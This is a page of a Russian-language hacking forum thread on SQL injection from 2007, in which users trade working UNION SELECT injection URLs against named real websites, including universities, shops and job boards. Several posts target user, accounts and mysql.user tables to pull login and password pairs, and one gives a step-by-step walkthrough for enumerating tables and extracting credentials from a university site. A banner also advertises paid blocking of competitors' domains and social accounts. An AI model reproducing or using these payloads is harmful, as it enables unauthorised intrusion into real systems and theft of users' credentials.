Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 61 из 1242

Опции темы

Поиск в этой теме

Опции просмотра

#601

27.02.2007, 14:58

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

http://research.udmercy.edu/ids/technoclass.php?id=-6+union+select+1,2,table_name,4,5,6+from+INFORMATI ON_SCHEMA.TABLES

там есть таблица user, но из неё не извлекается. Второй подобный сайт уже вижу =(

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#602

27.02.2007, 15:10

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

__http://www.shopcom.ru/shop.php?param=comment&a=1&id_shop=-1+union+select+1,2,3,name,mail,password,7,8,9,10,1 1+from+shop/*

Последний раз редактировалось Grey; 27.02.2007 в 15:23..

#603

27.02.2007, 15:11

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

Провел на форуме:
2848854

Репутация: 409

Отправить сообщение для злюка с помощью ICQ

Цитата:

Сообщение от Spyder

там есть таблица user, но из неё не извлекается. Второй подобный сайт уже вижу =(

таблица есть, но она просто пустаю...возможно есть какая то другая...у меня такое было...user пустая, зато siteuser с пользователями.

#604

27.02.2007, 15:25

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

2Spyder
SELECT count(*) from users

#605

27.02.2007, 16:51

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

http://gamemag.ru/?act=showart&id=-947+union+select+1,concat(login,0x3a,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user s/*

http://www.rba.ru/news/vid_news.php?id=-323+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+ from+mysql.user/*

http://www.trubka.net/showsoft.php?id=-1112+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://nextaz.com/showsoft.php?id=-5062+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://www.neftegaz.ru/kadr/viewvac.php?id=-21497+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19+from+users/*

http://www.mnl.ru/viewvac.php?id_vakansiya=-27770+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35/*

http://www.joblive.ru/viewvac.php?id=-51229203+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41/*

http://www.elit-dom.com/podrobnee.php?id=-103+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.iriscom.ru/index.php?page_id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.sdbireras.ru/product_detail.php?id=30&tip=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.use r/*

http://www.cz-usa.com/product_detail.php?id=-28+union+select+1,2,3,4,5,6/*

http://www.internaltool.com/products/product_detail.php?series=-81+union+select+1,2/*

http://www.infoelekt.com/public/product_detail.php?id=-1262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36/*

http://sportsoptics.pl/product_detail.php?group=scopes&id=-473+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38/*

#606

27.02.2007, 17:14

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

2 злюка
таблица не пустая. Когда пробуешь извлечь что либо оттуда появляется ошибка. Если бы она была пустая, то просто ничего не выводилось бы =)
http://research.udmercy.edu/ids/technoclass.php?id=-6+union+select+1,2,column_name,4,5,6+from+INFORMAT ION_SCHEMA.COLUMNS+where+table_name='user'
2 [ cash ]
не вкурил немного =) появляется ошибкаю или может я что то не так делаю?

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#607

27.02.2007, 17:59

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

1) смотрим таблицы

Код:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,table_name,3,4,5,6+from+INFORMATION_SCHEMA.TABLES/*

2)Смотрим кол-во в нужных таблицах.

Код:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+enroll_accounts/*

Код:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+accounts/*

Код:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+user/*

3)Выводим данные.

Код:

http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,concat(username,char(58),password),3,4,5,6+from+accounts/*

что тебя заинтересует я не знаю дальшейших методов взлома много дальше разбирайся сам.

in sql i trust )))

#608

27.02.2007, 18:13

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Дык я это знаю, не совсем уж ламер =) Просто count(*) from users выводит ошибку, а должна выводится по идее пустая страница

Цитата:

http://cat.xula.edu/courses/index.php?mode=view&id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#609

27.02.2007, 20:17

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

http://law.richmond.edu/essaycontests/view.php?record=-12+union+select+1,2,version(),4,5,6,7,8,9,10,11,12

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#610

27.02.2007, 21:36

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

__http://baby.com.ua/hit/school/obj_view_otziv.php3?p=view&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21/*

Страница 61 из 1242

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход